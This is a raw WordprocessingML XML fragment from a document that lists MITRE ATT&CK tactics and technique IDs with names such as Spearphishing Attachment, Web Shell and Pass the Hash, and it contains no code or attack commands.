      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Trusted Relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3423FE05"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T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D4D95C" w14:textId="77777777" w:rsidR="00605F46" w:rsidRPr="00674760" w:rsidRDefault="00605F46" w:rsidP="00605F46">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00674760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00674760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00674760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A38C9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1091 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Replication Through Removable Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585470F7"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1204.001', 'T1203', 'T1059.001', 'T1204.002', 'T1059.003', 'T1559.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7E88E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T1204.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2357B3BB"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1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7696D948"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C5179A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C5179A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141AA2E2"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T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE7782A"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T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F9C8B6"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T1559.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Inter-Process Communication&gt;:Dynamic Data Exchange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2795C5B6"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1133', 'T1098.002', 'T1078.004', 'T1505.003', 'T1547.001', 'T1037.001', 'T1137.002', 'T1078', 'T1546.015', 'T1542.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CE978E"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1133 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B990485"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T1098.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Manipulation&gt;:Additional Email Delegate Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F254E"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T1078.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Cloud Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F56E3A5"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T1505.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Server Software Component&gt;:Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236827A1"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC51A89"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T1037.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon Initialization Scripts&gt;:Logon Script (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D97EBD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T1137.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Office Application Startup&gt;:Office Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083E4FBA"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r w:rsidRPr="003D27B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D27B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D27B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598538C8"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T1546.015 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Component Object Model Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E042EB"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T1542.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Pre-OS Boot&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="447431A6"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1078.004', 'T1547.001', 'T1037.001', 'T1078', 'T1134.001', 'T1546.015', 'T1068']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A185F2"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T1078.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Cloud Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279C6A2F"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A25BA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T1037.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon Initialization Scripts&gt;:Logon Script (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA3C415"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA6110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T1134.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Access Token Manipulation&gt;:Token Impersonation/Theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E70FC2"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1546.015 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Component Object Model Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72544863"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1068 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2669DFAC"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1036.005', 'T1036', 'T1078.004', 'T1564.003', 'T1550.001', 'T1221', 'T1014', 'T1211', 'T1564.001', 'T1140', 'T1070.004', 'T1078', 'T1134.001', 'T1550.002', 'T1542.003', 'T1027', 'T1070.006', 'T1070.001', 'T1218.011']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B69DEE"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T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D58222"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1036 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Masquerading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EE47EA"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T1078.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Cloud Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B49B59E"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T1564.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hide Artifacts&gt;:Hidden Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C977E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T1550.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Application Access Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D094BA8"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1221 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Template Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8401A"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1014 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Rootkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AFF7A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1211 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBC3261"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T1564.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hide Artifacts&gt;:Hidden Files and Directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E5B158"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1140 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD14B6B"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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A472887"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EAA90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T1134.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Access Token Manipulation&gt;:Token Impersonation/Theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236306D3"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T1550.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Pass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2909969C"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T1542.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Pre-OS Boot&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FE39CDC"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r w:rsidRPr="008C730F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C730F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C730F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A059AF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T1070.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timestomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14178127"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T1070.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
